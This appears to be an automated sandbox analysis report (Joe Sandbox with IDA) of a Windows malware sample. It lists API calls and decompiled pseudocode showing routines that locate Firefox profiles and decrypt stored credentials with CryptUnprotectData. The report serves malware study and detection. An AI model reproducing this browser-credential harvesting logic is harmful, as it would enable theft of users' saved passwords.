    • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100823F6
    • RegEnumKeyA.ADVAPI32(?,00000000,?,00001000), ref: 1008241E
    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,00000000,00001000,?,00000000,00001000,00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000), ref: 10082470
    • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,00000000,?,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100824A5
    • StrStrIA.SHLWAPI(?,firefox), ref: 100824CA
    • RegQueryValueExA.KERNEL32(?,InstallLocation,00000000,00000000,?,?), ref: 100824FB
    • RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000000,?,00001000), ref: 10082534
    • RegEnumKeyA.ADVAPI32(?,00000001,?,00001000), ref: 10082556
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    • lstrlenA.KERNEL32(?), ref: 1008259F
      • Part of subcall function 10081EB0: HeapReAlloc.KERNEL32(00000008,?,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EDC
      • Part of subcall function 10081EB0: HeapAlloc.KERNEL32(00000008,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EEC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10001AA0, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 98string

    Control-flow Graph

    APIs
    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 10001B02
    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10001B0F
    • lstrlenA.KERNEL32(\Mozilla\Firefox\,?,?,?,?,?,?,?,00000000), ref: 10001B22
      • Part of subcall function 100821C0: wvnsprintfA.SHLWAPI(?,?,?,?), ref: 100821E8
      • Part of subcall function 100821C0: lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,10001B55,?,00000105,%s\profiles.ini,?,?,\Mozilla\Firefox\), ref: 100821F9
    • GetPrivateProfileStringA.KERNEL32(Profile0,Path,10094D91,?,00000105,?), ref: 10001B7A
    • wsprintfA.USER32 ref: 10001BAF
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1000C6F0, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 304

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 114 1000c6f0-1000c6ff 115 1000c700-1000c75d call 10081fb0 114->115 118 1000c75f-1000c76d call 1000c2c0 115->118 119 1000c77d 115->119 126 1000c773-1000c77b 118->126 127 1000cade-1000cae4 118->127 121 1000c781-1000c788 119->121 123 1000c7cc-1000c7d5 call 10009e80 121->123 124 1000c78a-1000c791 call 10009e00 121->124 131 1000c7d9-1000c7db 123->131 124->123 132 1000c793-1000c7a8 call 10009e80 124->132 126->121 133 1000cacd-1000cadb call 10005020 131->133 134 1000c7e1-1000c7ea call 1000c620 131->134 132->133 144 1000c7ae-1000c7ca call 1000a040 call 10005020 132->144 133->127 142 1000caac-1000cacc call 10005020 * 2 134->142 143 1000c7f0-1000c80a 134->143 145 1000c80c-1000c815 143->145 146 1000c817-1000c825 143->146 144->131 148 1000c827-1000c841 145->148 146->148 151 1000c92d 148->151 152 1000c847-1000c84e call 10009e00 148->152 155 1000c931-1000c949 CreateFileW 151->155 164 1000c925-1000c929 152->164 165 1000c854 152->165 161 1000c94f-1000c95d 155->161 162 1000c88a 155->162 163 1000c88e-1000c890 161->163 173 1000c963-1000c966 161->173 162->163 167 1000c892-1000c8b6 call 10007480 163->167 168 1000c8b9-1000c8bc 163->168 164->151 166 1000c858-1000c873 165->166 181 1000c886 166->181 182 1000c875-1000c884 call 1000a320 166->182 167->168 170 1000c8c2-1000c903 call 1000a250 call 10005020 * 2 168->170 171 1000c9d6-1000c9db 168->171 203 1000c909-1000c90e 170->203 204 1000c9ac-1000c9d5 call 10007480 170->204 179 1000c9e9-1000ca09 call 10005020 * 2 171->179 180 1000c9dd-1000c9e7 171->180 175 1000c968-1000c96b 173->175 176 1000c98d-1000c9aa 173->176 175->176 183 1000c96d-1000c970 175->183 176->155 200 1000ca0b-1000ca0d 179->200 201 1000ca0f 179->201 180->179 181->162 182->166 182->181 183->176 190 1000c972-1000c975 183->190 190->176 193 1000c977-1000c97a 190->193 193->176 196 1000c97c-1000c97f 193->196 196->176 198 1000c981-1000c987 196->198 198->163 198->176 202 1000ca14-1000ca24 200->202 201->202 207 1000ca2a-1000ca3d call 10081c20 202->207 208 1000ca26 202->208 203->204 206 1000c914-1000c920 203->206 206->115 212 1000ca5b 207->212 213 1000ca3f-1000ca59 call 100581f0 207->213 208->207 215 1000ca5f-1000caab 212->215 213->212 213->215
    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1000C93E
    Strings
    • cannot open file, xrefs: 1000C9B6
    • 424a0d380332858ee55bdebc4af3789f74e70a2b3ba1cf29d84b9b4bcf3e2e37, xrefs: 1000C9AC
    • psow, xrefs: 1000CA2D
    • %s at line %d of [%.10s], xrefs: 1000C9BB
    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1000C8AA
    • winOpen, xrefs: 1000C8D1
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01333790, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 278 1333790-133379a 279 13337a0-13337ba GetModuleHandleW 278->279 280 1333832-1333838 278->280 281 13337c2-13337d5 FindResourceW 279->281 282 13337bc-13337c1 279->282 283 13337d7-13337e1 LoadResource 281->283 284 133380c-1333814 281->284 283->284 285 13337e3-13337ef LockResource 283->285 285->284 286 13337f1-13337fd SizeofResource 285->286 286->284 287 13337ff-133380a call 1333570 286->287 287->284 290 1333815-1333831 call 133f490 287->290
    C-Code - Quality: 95%
    			E01333790(void* __ecx, WCHAR** _a4) {
				void* _v8;
				struct HINSTANCE__* _t7;
				struct HRSRC__* _t8;
				void* _t10;
				void* _t11;
				struct HRSRC__* _t17;
				struct HINSTANCE__* _t24;
				WCHAR* _t26;
				WCHAR** _t30;

				_push(__ecx);
				_t30 = _a4;
				if(_t30 == 0) {
					return 0;
				} else {
					_t30[1] = 0;
					 *_t30 = 0;
					_t7 = GetModuleHandleW(0);
					_t24 = _t7;
					if(_t24 != 0) {
						_t8 = FindResourceW(_t24, 0x65, "BMP"); // executed
						_t17 = _t8;
						if(_t17 == 0) {
							L8:
							return 0;
						} else {
							_t10 = LoadResource(_t24, _t17);
							if(_t10 == 0) {
								goto L8;
							} else {
								_t11 = LockResource(_t10);
								_v8 = _t11;
								if(_t11 == 0) {
									goto L8;
								} else {
									_t26 = SizeofResource(_t24, _t17);
									if(_t26 == 0 || E01333570(_t26, _t30) == 0) {
										goto L8;
									} else {
										E0133F490( *_t30, _v8, _t26);
										_t30[1] = _t26;
										return 1;
									}
								}
							}
						}
					} else {
						return _t7;
					}
				}
			}












    0x01333793
    0x01333795
    0x0133379a
    0x01333838
    0x013337a0
    0x013337a3
    0x013337aa
    0x013337b0
    0x013337b6
    0x013337ba
    0x013337cb
    0x013337d1
    0x013337d5
    0x0133380c
    0x01333814
    0x013337d7
    0x013337d9
    0x013337e1
    0x00000000
    0x013337e3
    0x013337e4
    0x013337ea
    0x013337ef
    0x00000000
    0x013337f1
    0x013337f9
    0x013337fd
    0x00000000
    0x01333815
    0x0133381b
    0x01333823
    0x01333831
    0x01333831
    0x013337fd
    0x013337ef
    0x013337e1
    0x013337bc
    0x013337c1
    0x013337c1
    0x013337ba

    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 013337B0
    • FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 013337CB
    • LoadResource.KERNEL32(00000000,00000000), ref: 013337D9
    • LockResource.KERNEL32(00000000), ref: 013337E4
    • SizeofResource.KERNEL32(00000000,00000000), ref: 013337F3
      • Part of subcall function 01333570: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,01333808), ref: 01333581
      • Part of subcall function 01333570: RtlAllocateHeap.NTDLL(00000000), ref: 01333588
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10081DF0, Relevance: 10.6, APIs: 7, Instructions: 60file

    Control-flow Graph

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10081E04
    • CloseHandle.KERNEL32(00000000), ref: 10081E22
    • GetFileSize.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E2D
    • CreateFileMappingA.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 10081E40
    • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E55
    • CloseHandle.KERNEL32(00000000), ref: 10081E64
    • CloseHandle.KERNEL32(00000000), ref: 10081E67
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133CF5F, Relevance: 9.2, APIs: 6, Instructions: 216

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 701 133cf5f-133cf78 702 133cf8e-133cf93 701->702 703 133cf7a-133cf8a call 133d516 701->703 705 133cf95-133cf9d 702->705 706 133cfa0-133cfc4 MultiByteToWideChar 702->706 703->702 710 133cf8c 703->710 705->706 708 133cfca-133cfd6 706->708 709 133d157-133d16a call 1333e82 706->709 711 133cfd8-133cfe9 708->711 712 133d02a 708->712 710->702 715 133cfeb-133cffa call 133f280 711->715 716 133d008-133d019 call 133883e 711->716 714 133d02c-133d02e 712->714 720 133d14c 714->720 721 133d034-133d047 MultiByteToWideChar 714->721 715->720 727 133d000-133d006 715->727 716->720 726 133d01f 716->726 724 133d14e-133d155 call 133b1a0 720->724 721->720 725 133d04d-133d05f call 133a942 721->725 724->709 732 133d064-133d068 725->732 730 133d025-133d028 726->730 727->730 730->714 732->720 733 133d06e-133d075 732->733 734 133d077-133d07c 733->734 735 133d0af-133d0bb 733->735 734->724 738 133d082-133d084 734->738 736 133d0bd-133d0ce 735->736 737 133d107 735->737 739 133d0d0-133d0df call 133f280 736->739 740 133d0e9-133d0fa call 133883e 736->740 742 133d109-133d10b 737->742 738->720 741 133d08a-133d0a4 call 133a942 738->741 745 133d145-133d14b call 133b1a0 739->745 756 133d0e1-133d0e7 739->756 740->745 757 133d0fc 740->757 741->724 754 133d0aa 741->754 744 133d10d-133d126 call 133a942 742->744 742->745 744->745 758 133d128-133d12f 744->758 745->720 754->720 759 133d102-133d105 756->759 757->759 760 133d16b-133d171 758->760 761 133d131-133d132 758->761 759->742 762 133d133-133d143 WideCharToMultiByte 760->762 761->762 762->745 763 133d173-133d17a call 133b1a0 762->763 763->724
    C-Code - Quality: 69%
    			E0133CF5F(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				void* _t80;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x1347004; // 0x262637d3
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0133D516(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t80);
					return E01333E82(_t80, _v8 ^ _t106, _t99, _t104);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0133B1A0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0133A942(_t81, _t85, _v12, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0133B1A0(_t101);
									goto L36;
								}
								_t62 = E0133A942(_t81, _t87, _t101, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0133B1A0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0133883E(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E0133F280();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0133A942(_t81, 0, _t100, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0133883E(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0133F280();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}
































    0x0133cf64
    0x0133cf65
    0x0133cf66
    0x0133cf6d
    0x0133cf72
    0x0133cf78
    0x0133cf7e
    0x0133cf84
    0x0133cf87
    0x0133cf87
    0x0133cf8a
    0x0133cf8c
    0x0133cf8c
    0x0133cf8a
    0x0133cf8e
    0x0133cf93
    0x0133cf9a
    0x0133cf9d
    0x0133cf9d
    0x0133cfb9
    0x0133cfbf
    0x0133cfc4
    0x0133d157
    0x0133d15a
    0x0133d15b
    0x0133d15c
    0x0133d16a
    0x0133cfca
    0x0133cfca
    0x0133cfcd
    0x0133cfd2
    0x0133cfd6
    0x0133d02a
    0x0133d02a
    0x0133d02c
    0x0133d02e
    0x0133d14c
    0x0133d14c
    0x0133d14e
    0x0133d14f
    0x00000000
    0x0133d155
    0x0133d03f
    0x0133d045
    0x0133d047
    0x00000000
    0x00000000
    0x0133d04d
    0x0133d05f
    0x0133d064
    0x0133d068
    0x00000000
    0x00000000
    0x0133d075
    0x0133d0af
    0x0133d0b2
    0x0133d0b5
    0x0133d0b7
    0x0133d0b9
    0x0133d0bb
    0x0133d107
    0x0133d107
    0x0133d109
    0x0133d109
    0x0133d10b
    0x0133d145
    0x0133d146
    0x00000000
    0x0133d14b
    0x0133d11f
    0x0133d124
    0x0133d126
    0x00000000
    0x00000000
    0x0133d12a
    0x0133d12b
    0x0133d12c
    0x0133d12f
    0x0133d16b
    0x0133d16e
    0x0133d131
    0x0133d131
    0x0133d132
    0x0133d132
    0x0133d13f
    0x0133d141
    0x0133d143
    0x0133d174
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0133d143
    0x0133d0bd
    0x0133d0c0
    0x0133d0c2
    0x0133d0c4
    0x0133d0c6
    0x0133d0c9
    0x0133d0ce
    0x0133d0e9
    0x0133d0eb
    0x0133d0f5
    0x0133d0f7
    0x0133d0f8
    0x0133d0fa
    0x00000000
    0x00000000
    0x0133d0fc
    0x0133d102
    0x0133d102
    0x00000000
    0x0133d102
    0x0133d0d0
    0x0133d0d2
    0x0133d0d6
    0x0133d0db
    0x0133d0dd
    0x0133d0df
    0x00000000
    0x00000000
    0x0133d0e1
    0x00000000
    0x0133d0e1
    0x0133d077
    0x0133d07c
    0x00000000
    0x00000000
    0x0133d082
    0x0133d084
    0x00000000
    0x00000000
    0x0133d09b
    0x0133d0a0
    0x0133d0a4
    0x00000000
    0x00000000
    0x00000000
    0x0133d0aa
    0x0133cfdd
    0x0133cfdf
    0x0133cfe1
    0x0133cfe9
    0x0133d008
    0x0133d00a
    0x0133d014
    0x0133d016
    0x0133d017
    0x0133d019
    0x00000000
    0x00000000
    0x0133d01f
    0x0133d025
    0x0133d025
    0x00000000
    0x0133d025
    0x0133cfed
    0x0133cff1
    0x0133cff6
    0x0133cffa
    0x00000000
    0x00000000
    0x0133d000
    0x00000000
    0x0133d000

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0133D1B0,?,?,00000000), ref: 0133CFB9
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0133D1B0,?,?,00000000,?,?,?), ref: 0133D03F
      • Part of subcall function 0133A942: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0133A9B3
      • Part of subcall function 0133883E: RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0133D139
    • __freea.LIBCMT ref: 0133D146
    • __freea.LIBCMT ref: 0133D14F
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    • __freea.LIBCMT ref: 0133D174
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10088170, Relevance: 9.2, APIs: 6, Instructions: 216

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 766 10088170-10088189 767 1008818b-1008819b call 1008ab4c 766->767 768 1008819f-100881a4 766->768 767->768 776 1008819d 767->776 770 100881b1-100881d5 MultiByteToWideChar 768->770 771 100881a6-100881ae 768->771 773 100881db-100881e7 770->773 774 10088368-1008837b call 100827ba 770->774 771->770 777 100881e9-100881fa 773->777 778 1008823b 773->778 776->768 781 100881fc-1008820b call 1008e7e0 777->781 782 10088219-1008822a call 10086449 777->782 780 1008823d-1008823f 778->780 784 10088245-10088258 MultiByteToWideChar 780->784 785 1008835d 780->785 781->785 791 10088211-10088217 781->791 782->785 792 10088230 782->792 784->785 789 1008825e-10088270 call 10087064 784->789 790 1008835f-10088366 call 10085296 785->790 797 10088275-10088279 789->797 790->774 795 10088236-10088239 791->795 792->795 795->780 797->785 798 1008827f-10088286 797->798 799 10088288-1008828d 798->799 800 100882c0-100882cc 798->800 799->790 803 10088293-10088295 799->803 801 100882ce-100882df 800->801 802 10088318 800->802 806 100882fa-1008830b call 10086449 801->806 807 100882e1-100882f0 call 1008e7e0 801->807 805 1008831a-1008831c 802->805 803->785 804 1008829b-100882b5 call 10087064 803->804 804->790 819 100882bb 804->819 808 10088356-1008835c call 10085296 805->808 809 1008831e-10088337 call 10087064 805->809 806->808 821 1008830d 806->821 807->808 820 100882f2-100882f8 807->820 808->785 809->808 823 10088339-10088340 809->823 819->785 824 10088313-10088316 820->824 821->824 825 10088342-10088343 823->825 826 1008837c-10088382 823->826 824->805 827 10088344-10088354 WideCharToMultiByte 825->827 826->827 827->808 828 10088384-1008838b call 10085296 827->828 828->790
    APIs
    • MultiByteToWideChar.KERNEL32(00000100,00000000,?,?,00000000,00000000,00000000,00000100,00000000,?,?,?,100883C1,00000100,00000100,?), ref: 100881CA
    • MultiByteToWideChar.KERNEL32(00000100,00000001,?,?,00000000,?,?,?,?,100883C1,00000100,00000100,?,00000100,?,?), ref: 10088250
      • Part of subcall function 10087064: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00000100,?,00000100,00000100,10001C26), ref: 100870D5
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • WideCharToMultiByte.KERNEL32(00000100,00000000,00000000,00000000,00000100,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1008834A
    • __freea.LIBCMT ref: 10088357
    • __freea.LIBCMT ref: 10088360
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    • __freea.LIBCMT ref: 10088385
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100014A0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91com
    APIs
    • CoCreateInstance.OLE32(100902A0,00000000,00000017,100902B0,?), ref: 100014C8
    • StrStrIW.SHLWAPI(?,http), ref: 1000157B
      • Part of subcall function 10001200: lstrlenW.KERNEL32(00000000,?,00000000,76F846E9), ref: 1000125A
      • Part of subcall function 10001200: lstrlenW.KERNEL32(00000000), ref: 100012FF
      • Part of subcall function 10001200: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000132B
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 1000133E
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 10001355
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 1000144E
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 10001465
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 10001474
      • Part of subcall function 10001200: LocalFree.KERNEL32(00000000), ref: 1000147D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100891F3, Relevance: 6.1, APIs: 4, Instructions: 68
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 100891FC
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1008921F
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10089245
      • Part of subcall function 1008640F: HeapFree.KERNEL32(00000000,00000000), ref: 10086425
      • Part of subcall function 1008640F: GetLastError.KERNEL32(00000000,?,1008A93D,00000000,00000000,00000000,00000000,?,1008A964,00000000,00000007,00000000,?,1008A2E9,00000000,00000000), ref: 10086437
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10089267
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01336B36, Relevance: 6.1, APIs: 4, Instructions: 54library
    C-Code - Quality: 65%
    			E01336B36(signed int _a4) {
				void* _t10;
				void* _t13;
				signed int _t15;
				signed int _t21;
				WCHAR* _t22;
				signed int* _t25;
				void* _t27;

				_t21 = _a4;
				_t25 = 0x1347c24 + _t21 * 4;
				asm("lock cmpxchg [edi], ecx");
				if(0 == 0) {
					_t22 =  *(0x1340264 + _t21 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				asm("sbb eax, eax");
				return  ~0x00000001 & 0;
			}










    0x01336b3a
    0x01336b42
    0x01336b49
    0x01336b51
    0x01336b5e
    0x01336b6e
    0x01336b74
    0x01336b78
    0x01336ba1
    0x01336ba3
    0x01336ba7
    0x01336baa
